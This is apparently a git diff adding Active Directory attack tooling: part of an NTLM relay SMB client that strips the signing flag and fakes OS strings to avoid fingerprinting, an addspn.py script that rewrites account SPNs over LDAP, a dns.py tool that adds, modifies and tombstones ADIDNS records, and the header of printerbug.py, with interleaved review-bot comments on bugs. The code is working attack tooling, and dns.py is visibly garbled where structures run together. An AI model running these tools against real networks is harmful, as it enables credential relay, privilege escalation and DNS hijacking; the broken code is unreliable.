SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES + else: + flags2 = SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_LONG_NAMES + try: + packet = self.session.negotiateSessionWildcard(None, self.targetHost, self.targetHost, self.targetPort, 60, self.extendedSecurity, + flags1=SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS, + flags2=flags2, data=data) + except socketerror as e: + if 'reset by peer' in str(e): + if not self.serverConfig.smb2support: + LOG.error('SMBCLient error: Connection was reset. Possibly the target has SMBv1 disabled. Try running ntlmrelayx with -smb2support') + else: + LOG.error('SMBCLient error: Connection was reset') + else: + LOG.error('SMBCLient error: %s' % str(e)) + return False + if packet[0] == '\xfe': + smbClient = MYSMB3(self.targetHost, self.targetPort, self.extendedSecurity,nmbSession=self.session.getNMBServer(), negPacket=packet) + else: + # Answer is SMB packet, sticking to SMBv1 + smbClient = MYSMB(self.targetHost, self.targetPort, self.extendedSecurity,nmbSession=self.session.getNMBServer(), negPacket=packet) + + self.session = SMBConnection(self.targetHost, self.targetHost, sess_port= self.targetPort, + existingConnection=smbClient, manualNegotiate=True) + + return True + + def setUid(self,uid): + self._uid = uid + + def sendNegotiate(self, negotiateMessage): + negotiate = NTLMAuthNegotiate() + negotiate.fromString(negotiateMessage) + #Remove the signing flag + negotiate['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN + + challenge = NTLMAuthChallenge() + if self.session.getDialect() == SMB_DIALECT: + challenge.fromString(self.sendNegotiatev1(negotiateMessage)) + else: + challenge.fromString(self.sendNegotiatev2(negotiateMessage)) + + # Store the Challenge in our session data dict. 
It will be used by the SMB Proxy + self.sessionData['CHALLENGE_MESSAGE'] = challenge + + return challenge + + def sendNegotiatev2(self, negotiateMessage): + v2client = self.session.getSMBServer() + + sessionSetup = SMB2SessionSetup() + sessionSetup['Flags'] = 0 + + # Let's build a NegTokenInit with the NTLMSSP + blob = SPNEGO_NegTokenInit() + + # NTLMSSP + blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']] + blob['MechToken'] = str(negotiateMessage) + + sessionSetup['SecurityBufferLength'] = len(blob) + sessionSetup['Buffer'] = blob.getData() + + packet = v2client.SMB_PACKET() + packet['Command'] = SMB2_SESSION_SETUP + packet['Data'] = sessionSetup + + packetID = v2client.sendSMB(packet) + ans = v2client.recvSMB(packetID) + if ans.isValidAnswer(STATUS_MORE_PROCESSING_REQUIRED): + v2client._Session['SessionID'] = ans['SessionID'] + sessionSetupResponse = SMB2SessionSetup_Response(ans['Data']) + respToken = SPNEGO_NegTokenResp(sessionSetupResponse['Buffer']) + return respToken['ResponseToken'] + + return False + + def sendNegotiatev1(self, negotiateMessage): + v1client = self.session.getSMBServer() + + smb = NewSMBPacket() + smb['Flags1'] = SMB.FLAGS1_PATHCASELESS + smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY + # Are we required to sign SMB? 
If so we do it, if not we skip it + if v1client.is_signing_required(): + smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE + + + sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) + sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters() + sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data() + + sessionSetup['Parameters']['MaxBufferSize'] = 65535 + sessionSetup['Parameters']['MaxMpxCount'] = 2 + sessionSetup['Parameters']['VcNumber'] = 1 + sessionSetup['Parameters']['SessionKey'] = 0 + sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE + + # Let's build a NegTokenInit with the NTLMSSP + # TODO: In the future we should be able to choose different providers + + blob = SPNEGO_NegTokenInit() + + # NTLMSSP + blob['MechTypes'] = [TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']] + blob['MechToken'] = str(negotiateMessage) + + sessionSetup['Parameters']['SecurityBlobLength'] = len(blob) + sessionSetup['Parameters'].getData() + sessionSetup['Data']['SecurityBlob'] = blob.getData() + + # Fake Data here, don't want to get us fingerprinted + sessionSetup['Data']['NativeOS'] = 'Unix' + sessionSetup['Data']['NativeLanMan'] = 'Samba' + + smb.addCommand(sessionSetup) + v1client.sendSMB(smb) + smb = v1client.recvSMB() + + try: + smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) + except Exception: + LOG.error("SessionSetup Error!") + raise + else: + # We will need to use this uid field for all future requests/responses + v1client.set_uid(smb['Uid']) + + # Now we have to extract the blob to continue the auth process + sessionResponse = SMBCommand(smb['Data'][0]) + sessionParameters = SMBSessionSetupAndX_Extended_Response_Parameters(sessionResponse['Parameters']) + sessionData = SMBSessionSetupAndX_Extended_Response_Data(flags = smb['Flags2']) + sessionData['SecurityBlobLength'] = sessionParameters['SecurityBlobLength'] + sessionData.fromString(sessionResponse['Data']) + 
respToken = SPNEGO_NegTokenResp(sessionData['SecurityBlob']) + + return respToken['ResponseToken'] + + def sendStandardSecurityAuth(self, sessionSetupData): + v1client = self.session.getSMBServer() + flags2 = v1client.get_flags()[1] + v1client.set_flags(flags2=flags2 & (~SMB.FLAGS2_EXTENDED_SECURITY)) + if sessionSetupData['Account'] != '': + smb = NewSMBPacket() + smb['Flags1'] = 8 + + sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) + sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters() + sessionSetup['Data'] = SMBSessionSetupAndX_Data() + + sessionSetup['Parameters']['MaxBuffer'] = 65535 + sessionSetup['Parameters']['MaxMpxCount'] = 2 + sessionSetup['Parameters']['VCNumber'] = os.getpid() + sessionSetup['Parameters']['SessionKey'] = v1client._dialects_parameters['SessionKey'] + sessionSetup['Parameters']['AnsiPwdLength'] = len(sessionSetupData['AnsiPwd']) + sessionSetup['Parameters']['UnicodePwdLength'] = len(sessionSetupData['UnicodePwd']) + sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE + + sessionSetup['Data']['AnsiPwd'] = sessionSetupData['AnsiPwd'] + sessionSetup['Data']['UnicodePwd'] = sessionSetupData['UnicodePwd'] + sessionSetup['Data']['Account'] = str(sessionSetupData['Account']) + sessionSetup['Data']['PrimaryDomain'] = str(sessionSetupData['PrimaryDomain']) + sessionSetup['Data']['NativeOS'] = 'Unix' + sessionSetup['Data']['NativeLanMan'] = 'Samba' + + smb.addCommand(sessionSetup) + + v1client.sendSMB(smb) + smb = v1client.recvSMB() + try: + smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX) + except: + return None, STATUS_LOGON_FAILURE + else: + v1client.set_uid(smb['Uid']) + return smb, STATUS_SUCCESS + else: + # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials + clientResponse = None + errorCode = STATUS_ACCESS_DENIED + + return clientResponse, errorCode + + def sendAuth(self, authenticateMessageBlob, serverChallenge=None): + if unpack('B', 
str(authenticateMessageBlob)[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP: + # We need to wrap the NTLMSSP into SPNEGO + respToken2 = SPNEGO_NegTokenResp() + respToken2['ResponseToken'] = str(authenticateMessageBlob) + authData = respToken2.getData() + else: + authData = str(authenticateMessageBlob) + + if self.session.getDialect() == SMB_DIALECT: + token, errorCode = self.sendAuthv1(authData, serverChallenge) + else: + token, errorCode = self.sendAuthv2(authData, serverChallenge) + return token, errorCode + + def sendAuthv2(self, authenticateMessageBlob, serverChallenge=None): + v2client = self.session.getSMBServer() + + sessionSetup = SMB2SessionSetup() + sessionSetup['Flags'] = 0 + + packet = v2client.SMB_PACKET() + packet['Command'] = SMB2_SESSION_SETUP + packet['Data'] = sessionSetup + + # Reusing the previous structure + sessionSetup['SecurityBufferLength'] = len(authenticateMessageBlob) + sessionSetup['Buffer'] = authenticateMessageBlob + + packetID = v2client.sendSMB(packet) + packet = v2client.recvSMB(packetID) + + return packet, packet['Status'] + + def sendAuthv1(self, authenticateMessageBlob, serverChallenge=None): + v1client = self.session.getSMBServer() + + smb = NewSMBPacket() + smb['Flags1'] = SMB.FLAGS1_PATHCASELESS + smb['Flags2'] = SMB.FLAGS2_EXTENDED_SECURITY + # Are we required to sign SMB? 
If so we do it, if not we skip it + if v1client.is_signing_required(): + smb['Flags2'] |= SMB.FLAGS2_SMB_SECURITY_SIGNATURE + smb['Uid'] = v1client.get_uid() + + sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX) + sessionSetup['Parameters'] = SMBSessionSetupAndX_Extended_Parameters() + sessionSetup['Data'] = SMBSessionSetupAndX_Extended_Data() + + sessionSetup['Parameters']['MaxBufferSize'] = 65535 + sessionSetup['Parameters']['MaxMpxCount'] = 2 + sessionSetup['Parameters']['VcNumber'] = 1 + sessionSetup['Parameters']['SessionKey'] = 0 + sessionSetup['Parameters']['Capabilities'] = SMB.CAP_EXTENDED_SECURITY | SMB.CAP_USE_NT_ERRORS | SMB.CAP_UNICODE + + # Fake Data here, don't want to get us fingerprinted + sessionSetup['Data']['NativeOS'] = 'Unix' + sessionSetup['Data']['NativeLanMan'] = 'Samba' + + sessionSetup['Parameters']['SecurityBlobLength'] = len(authenticateMessageBlob) + sessionSetup['Data']['SecurityBlob'] = authenticateMessageBlob + smb.addCommand(sessionSetup) + v1client.sendSMB(smb) + + smb = v1client.recvSMB() + + errorCode = smb['ErrorCode'] << 16 + errorCode += smb['_reserved'] << 8 + errorCode += smb['ErrorClass'] + + return smb, errorCode + + def getStandardSecurityChallenge(self): + if self.session.getDialect() == SMB_DIALECT: + return self.session.getSMBServer().get_encryption_key() + else: + return None diff --git a/kerbexec/exp/addspn.py b/kerbexec/exp/addspn.py new file mode 100644 index 0000000..9a7cdef --- /dev/null +++ b/kerbexec/exp/addspn.py 
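Review bot: `sendStandardSecurityAuth` wraps `smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)` in a bare `except:` and turns every failure, including `KeyboardInterrupt` and programming errors, into `STATUS_LOGON_FAILURE` without logging, whereas `sendNegotiatev1` logs and re-raises for the same call. I would write `except Exception as e:` and add `LOG.debug('SessionSetup failed: %s' % e)` before the return. The module also still handles wire data as Python 2 `str` (`packet[0] == '\xfe'`, `str(negotiateMessage)`), and `initConnection(self)` does not accept the `authdata, kdc` arguments that the HTTP and LDAP clients in this commit take; a header comment should say whether this client is meant to be ported or is carried over unchanged.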
@@ -0,0 +1,211 @@ +#!/usr/bin/env python +#################### +# +# Copyright (c) 2023 Dirk-jan Mollema (@_dirkjan) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
+# +# +# Add an SPN to a user/computer account via LDAP +# +#################### +import sys +import argparse +import random +import string +import getpass +import os +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS +from impacket.krb5.types import Principal +from impacket.krb5 import constants +from ldap3 import NTLM, Server, Connection, ALL, LEVEL, BASE, MODIFY_DELETE, MODIFY_ADD, MODIFY_REPLACE, SASL, KERBEROS +from lib.utils.kerberos import ldap_kerberos +import ldap3 +from ldap3.protocol.microsoft import security_descriptor_control + +def print_m(string): + sys.stderr.write('\033[94m[-]\033[0m %s\n' % (string)) + +def print_o(string): + sys.stderr.write('\033[92m[+]\033[0m %s\n' % (string)) + +def print_f(string): + sys.stderr.write('\033[91m[!]\033[0m %s\n' % (string)) + +def main(): + parser = argparse.ArgumentParser(description='Add an SPN to a user/computer account') + parser._optionals.title = "Main options" + parser._positionals.title = "Required options" + + #Main parameters + parser.add_argument("host", metavar='HOSTNAME', help="Hostname/ip or ldap://host:port connection string to connect to") + parser.add_argument("-u", "--user", metavar='USERNAME', help="DOMAIN\\username for authentication") + parser.add_argument("-p", "--password", metavar='PASSWORD', help="Password or LM:NTLM hash, will prompt if not specified") + parser.add_argument("-t", "--target", metavar='TARGET', help="Computername or username to target (FQDN or COMPUTER$ name, if unspecified user with -u is target)") + parser.add_argument("-T", "--target-type", metavar='TARGETTYPE', choices=('samname','hostname','auto'), default='auto', help="Target type (samname or hostname) If unspecified, will assume it's a hostname if there is a . 
in the name and a SAM name otherwise.") + parser.add_argument("-s", "--spn", metavar='SPN', help="servicePrincipalName to add (for example: http/host.domain.local or cifs/host.domain.local)") + parser.add_argument("-r", "--remove", action='store_true', help="Remove the SPN instead of add it") + parser.add_argument("-c", "--clear", action='store_true', help="Clear, i.e. remove all SPNs") + parser.add_argument("-q", "--query", action='store_true', help="Show the current target SPNs instead of modifying anything") + parser.add_argument("-a", "--additional", action='store_true', help="Add the SPN via the msDS-AdditionalDnsHostName attribute") + parser.add_argument('-k', '--kerberos', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' + '(KRB5CCNAME) based on target parameters. If valid credentials ' + 'cannot be found, it will use the ones specified in the command ' + 'line') + parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. 
If omitted it will use the domain part (FQDN) specified in the target parameter') + parser.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication ' + '(128 or 256 bits)') + + args = parser.parse_args() + + if not args.query and not args.clear: + if not args.spn: + parser.error("-s/--spn is required when not querying (-q/--query) or clearing (--clear)") + + #Prompt for password if not set + authentication = None + if not args.user or not '\\' in args.user: + print_f('Username must include a domain, use: DOMAIN\\username') + sys.exit(1) + domain, user = args.user.split('\\', 1) + if not args.kerberos: + authentication = NTLM + sasl_mech = None + if args.password is None: + args.password = getpass.getpass() + else: + TGT = None + TGS = None + try: + # Hashes + lmhash, nthash = args.password.split(':') + assert len(nthash) == 32 + password = '' + except: + # Password + lmhash = '' + nthash = '' + password = args.password + if 'KRB5CCNAME' in os.environ and os.path.exists(os.environ['KRB5CCNAME']): + domain, user, TGT, TGS = CCache.parseFile(domain, user, 'ldap/%s' % args.host) + if args.dc_ip is None: + kdcHost = domain + else: + kdcHost = options.dc_ip + userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value) + if not TGT and not TGS: + tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, args.aesKey, kdcHost) + elif TGT: + # Has TGT + tgt = TGT['KDC_REP'] + cipher = TGT['cipher'] + sessionKey = TGT['sessionKey'] + if not TGS: + # Request TGS + serverName = Principal('ldap/%s' % args.host, type=constants.PrincipalNameType.NT_SRV_INST.value) + TGS = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey) + else: + # Convert to tuple expected + TGS = (TGS['KDC_REP'], TGS['cipher'], TGS['sessionKey'], TGS['sessionKey']) + authentication = SASL + sasl_mech = KERBEROS + + controls = security_descriptor_control(sdflags=0x04) + # define the 
server and the connection + s = Server(args.host, get_info=ALL) + print_m('Connecting to host...') + c = Connection(s, user=args.user, password=args.password, authentication=authentication, sasl_mechanism=sasl_mech) + print_m('Binding to host') + # perform the Bind operation + if authentication == NTLM: + if not c.bind(): + print_f('Could not bind with specified credentials') + print_f(c.result) + sys.exit(1) + else: + ldap_kerberos(domain, kdcHost, None, userName, c, args.host, TGS) + print_o('Bind OK') + + if args.target: + targetuser = args.target + else: + targetuser = args.user.split('\\')[1] + + if ('.' in targetuser and args.target_type != 'samname') or args.target_type == 'hostname': + if args.target_type == 'auto': + print_m('Assuming target is a hostname. If this is incorrect use --target-type samname') + search = '(dnsHostName=%s)' % targetuser + else: + search = '(SAMAccountName=%s)' % targetuser + c.search(s.info.other['defaultNamingContext'][0], search, controls=controls, attributes=['SAMAccountName', 'servicePrincipalName', 'dnsHostName', 'msds-additionaldnshostname']) + + try: + targetobject = c.entries[0] + print_o('Found modification target') + except IndexError: + print_f('Target not found!') + return + + if args.remove: + operation = ldap3.MODIFY_DELETE + elif args.clear: + operation = ldap3.MODIFY_REPLACE + else: + operation = ldap3.MODIFY_ADD + + if args.query: + # If we only want to query it + print(targetobject) + return + + + if not args.additional: + if args.clear: + print_o('Printing object before clearing') + print(targetobject) + c.modify(targetobject.entry_dn, {'servicePrincipalName':[(operation, [])]}) + else: + c.modify(targetobject.entry_dn, {'servicePrincipalName':[(operation, [args.spn])]}) + else: + try: + host = args.spn.split('/')[1] + except IndexError: + # Assume this is the hostname + host = args.spn + c.modify(targetobject.entry_dn, {'msds-additionaldnshostname':[(operation, [host])]}) + + if c.result['result'] == 0: + 
print_o('SPN Modified successfully') + else: + if c.result['result'] == 50: + print_f('Could not modify object, the server reports insufficient rights: %s' % c.result['message']) + elif c.result['result'] == 19: + print_f('Could not modify object, the server reports a constrained violation') + if args.additional: + print_f('You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs ending on the domain FQDN)') + else: + print_f('You either supplied a malformed SPN, or you do not have access rights to add this SPN (Validated write only allows adding SPNs matching the hostname)') + print_f('To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute') + else: + print_f('The server returned an error: %s' % c.result['message']) + + +if __name__ == '__main__': + main() diff --git a/kerbexec/exp/dns.py b/kerbexec/exp/dns.py new file mode 100644 index 0000000..08dc9a3 --- /dev/null +++ b/kerbexec/exp/dns.py 
@@ -0,0 +1,610 @@ +#!/usr/bin/env python +#################### +# +# Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
+# +# Tool to interact with ADIDNS over LDAP +# +#################### +import sys +import argparse +import getpass +import re +import os +import socket +from struct import unpack, pack +from impacket.structure import Structure +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS +from impacket.krb5.types import Principal +from impacket.krb5 import constants +from ldap3 import NTLM, Server, Connection, ALL, LEVEL, BASE, MODIFY_DELETE, MODIFY_ADD, MODIFY_REPLACE, SASL, KERBEROS +from lib.utils.kerberos import ldap_kerberos +import ldap3 +from impacket.ldap import ldaptypes +import dns.resolver +import datetime + +def print_m(string): + sys.stderr.write('\033[94m[-]\033[0m %s\n' % (string)) + +def print_o(string): + sys.stderr.write('\033[92m[+]\033[0m %s\n' % (string)) + +def print_f(string): + sys.stderr.write('\033[91m[!]\033[0m %s\n' % (string)) + + + +class DNS_RECORD(Structure): + """ + dnsRecord - used in LDAP + [MS-DNSP] section 2.3.2.2 + """ + structure = ( + ('DataLength', 'L'), + ('Reserved', 'H'), + ('wRecordCount', '>H'), + ('dwFlags', '>L'), + ('dwChildCount', '>L'), + ('dnsNodeName', ':') + ) + +class DNS_RPC_RECORD_A(Structure): + """ + DNS_RPC_RECORD_A + [MS-DNSP] section 2.2.2.2.4.1 + """ + structure = ( + ('address', ':'), + ) + + def formatCanonical(self): + return socket.inet_ntoa(self['address']) + + def fromCanonical(self, canonical): + self['address'] = socket.inet_aton(canonical) + + +class DNS_RPC_RECORD_NODE_NAME(Structure): + """ + DNS_RPC_RECORD_NODE_NAME + [MS-DNSP] section 2.2.2.2.4.2 + """ + structure = ( + ('nameNode', ':', DNS_COUNT_NAME), + ) + +class DNS_RPC_RECORD_SOA(Structure): + """ + DNS_RPC_RECORD_SOA + [MS-DNSP] section 2.2.2.2.4.3 + """ + structure = ( + ('dwSerialNo', '>L'), + ('dwRefresh', '>L'), + ('dwRetry', '>L'), + ('dwExpire', '>L'), + ('dwMinimumTtl', '>L'), + ('namePrimaryServer', ':', DNS_COUNT_NAME), + ('zoneAdminEmail', ':', DNS_COUNT_NAME) + ) + +class 
DNS_RPC_RECORD_NULL(Structure): + """ + DNS_RPC_RECORD_NULL + [MS-DNSP] section 2.2.2.2.4.4 + """ + structure = ( + ('bData', ':'), + ) + +# Some missing structures here that I skipped + +class DNS_RPC_RECORD_NAME_PREFERENCE(Structure): + """ + DNS_RPC_RECORD_NAME_PREFERENCE + [MS-DNSP] section 2.2.2.2.4.8 + """ + structure = ( + ('wPreference', '>H'), + ('nameExchange', ':', DNS_COUNT_NAME) + ) + +# Some missing structures here that I skipped + +class DNS_RPC_RECORD_AAAA(Structure): + """ + DNS_RPC_RECORD_AAAA + [MS-DNSP] section 2.2.2.2.4.17 + [MS-DNSP] section 2.2.2.2.4.17 + """ + structure = ( + ('ipv6Address', '16s'), + ) + +class DNS_RPC_RECORD_SRV(Structure): + """ + DNS_RPC_RECORD_SRV + [MS-DNSP] section 2.2.2.2.4.18 + """ + structure = ( + ('wPriority', '>H'), + ('wWeight', '>H'), + ('wPort', '>H'), + ('nameTarget', ':', DNS_COUNT_NAME) + ) + +class DNS_RPC_RECORD_TS(Structure): + """ + DNS_RPC_RECORD_TS + [MS-DNSP] section 2.2.2.2.4.23 + """ + structure = ( + ('entombedTime', ' 0: + print_m('Found %d domain DNS zones:' % len(zones)) + for zone in zones: + print(' %s' % zone) + forestdns = 'CN=MicrosoftDNS,DC=ForestDnsZones,%s' % s.info.other['rootDomainNamingContext'][0] + zones = get_dns_zones(c, forestdns) + if len(zones) > 0: + print_m('Found %d forest DNS zones:' % len(zones)) + for zone in zones: + print(' %s' % zone) + return + + + target = args.record + if args.zone: + zone = args.zone + else: + # Default to current domain + zone = ldap2domain(domainroot) + + if not target: + print_f('You need to specify a target record') + return + + if target.lower().endswith(zone.lower()): + target = target[:-(len(zone)+1)] + + + searchtarget = 'DC=%s,%s' % (zone, dnsroot) + # print s.info.naming_contexts + c.search(searchtarget, '(&(objectClass=dnsNode)(name=%s))' % ldap3.utils.conv.escape_filter_chars(target), attributes=['dnsRecord','dNSTombstoned','name']) + targetentry = None + for entry in c.response: + if entry['type'] != 'searchResEntry': + continue + 
targetentry = entry + + # Check if we have the required data + if args.action in ['add', 'modify', 'remove'] and not args.data: + print_f('This operation requires you to specify record data with --data') + return + + + # Check if we need the target record to exists, and if yes if it does + if args.action in ['modify', 'remove', 'ldapdelete', 'resurrect', 'query'] and not targetentry: + print_f('Target record not found!') + return + + + if args.action == 'query': + print_o('Found record %s' % targetentry['attributes']['name']) + for record in targetentry['raw_attributes']['dnsRecord']: + dr = DNS_RECORD(record) + # dr.dump() + print(targetentry['dn']) + print_record(dr, targetentry['attributes']['dNSTombstoned']) + continue + elif args.action == 'add': + # Only A records for now + addtype = 1 + # Entry exists + if targetentry: + if not args.allow_multiple: + for record in targetentry['raw_attributes']['dnsRecord']: + dr = DNS_RECORD(record) + if dr['Type'] == 1: + address = DNS_RPC_RECORD_A(dr['Data']) + print_f('Record already exists and points to %s. 
Use --action modify to overwrite or --allow-multiple to override this' % address.formatCanonical()) + return False + # If we are here, no A records exists yet + record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp)) + record['Data'] = DNS_RPC_RECORD_A() + record['Data'].fromCanonical(args.data) + print_m('Adding extra record') + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_ADD, record.getData())]}) + print_operation_result(c.result) + else: + node_data = { + # Schema is in the root domain (take if from schemaNamingContext to be sure) + 'objectCategory': 'CN=Dns-Node,%s' % s.info.other['schemaNamingContext'][0], + 'dNSTombstoned': False, + 'name': target + } + record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp)) + record['Data'] = DNS_RPC_RECORD_A() + record['Data'].fromCanonical(args.data) + record_dn = 'DC=%s,%s' % (target, searchtarget) + node_data['dnsRecord'] = [record.getData()] + print_m('Adding new record') + c.add(record_dn, ['top', 'dnsNode'], node_data) + print_operation_result(c.result) + elif args.action == 'modify': + # Only A records for now + addtype = 1 + # We already know the entry exists + targetrecord = None + records = [] + for record in targetentry['raw_attributes']['dnsRecord']: + dr = DNS_RECORD(record) + if dr['Type'] == 1: + targetrecord = dr + else: + records.append(record) + if not targetrecord: + print_f('No A record exists yet. 
Use --action add to add it') + targetrecord['Serial'] = get_next_serial(args.dns_ip, args.host, zone,args.tcp) + targetrecord['Data'] = DNS_RPC_RECORD_A() + targetrecord['Data'].fromCanonical(args.data) + records.append(targetrecord.getData()) + print_m('Modifying record') + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, records)]}) + print_operation_result(c.result) + elif args.action == 'remove': + addtype = 0 + if len(targetentry['raw_attributes']['dnsRecord']) > 1: + print_m('Target has multiple records, removing the one specified') + targetrecord = None + for record in targetentry['raw_attributes']['dnsRecord']: + dr = DNS_RECORD(record) + if dr['Type'] == 1: + tr = DNS_RPC_RECORD_A(dr['Data']) + if tr.formatCanonical() == args.data: + targetrecord = record + if not targetrecord: + print_f('Could not find a record with the specified data') + return + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_DELETE, targetrecord)]}) + print_operation_result(c.result) + else: + print_m('Target has only one record, tombstoning it') + diff = datetime.datetime.today() - datetime.datetime(1601,1,1) + tstime = int(diff.total_seconds()*10000) + # Add a null record + record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp)) + record['Data'] = DNS_RPC_RECORD_TS() + record['Data']['entombedTime'] = tstime + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, [record.getData()])], + 'dNSTombstoned': [(MODIFY_REPLACE, True)]}) + print_operation_result(c.result) + elif args.action == 'ldapdelete': + print_m('Deleting record over LDAP') + c.delete(targetentry['dn']) + print_operation_result(c.result) + elif args.action == 'resurrect': + addtype = 0 + if len(targetentry['raw_attributes']['dnsRecord']) > 1: + print_m('Target has multiple records, I dont know how to handle this.') + return + else: + print_m('Target has only one record, resurrecting it') + diff = datetime.datetime.today() - datetime.datetime(1601,1,1) + tstime = 
int(diff.total_seconds()*10000) + # Add a null record + record = new_record(addtype, get_next_serial(args.dns_ip, args.host, zone,args.tcp)) + record['Data'] = DNS_RPC_RECORD_TS() + record['Data']['entombedTime'] = tstime + c.modify(targetentry['dn'], {'dnsRecord': [(MODIFY_REPLACE, [record.getData()])], + 'dNSTombstoned': [(MODIFY_REPLACE, False)]}) + print_o('Record resurrected. You will need to (re)add the record with the IP address.') + +if __name__ == '__main__': + main() diff --git a/kerbexec/exp/printerbug.py b/kerbexec/exp/printerbug.py new file mode 100644 index 0000000..a34b728 --- /dev/null +++ b/kerbexec/exp/printerbug.py 
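Review bot: In the `modify` branch of `main`, the `if not targetrecord:` check prints "No A record exists yet" but does not return, so the next statement, `targetrecord['Serial'] = ...`, indexes `None` and the run ends in a TypeError instead of the intended message. Add a `return` directly after that `print_f(...)` call, as the `remove` branch already does for its own not-found case. Separately, the `resurrect` branch never calls `print_operation_result(c.result)`, so a modify that the server rejected is still reported as "Record resurrected".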
@@ -0,0 +1,253 @@ +#!/usr/bin/env python +#################### +# +# Copyright (c) 2019 Dirk-jan Mollema (@_dirkjan) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. 
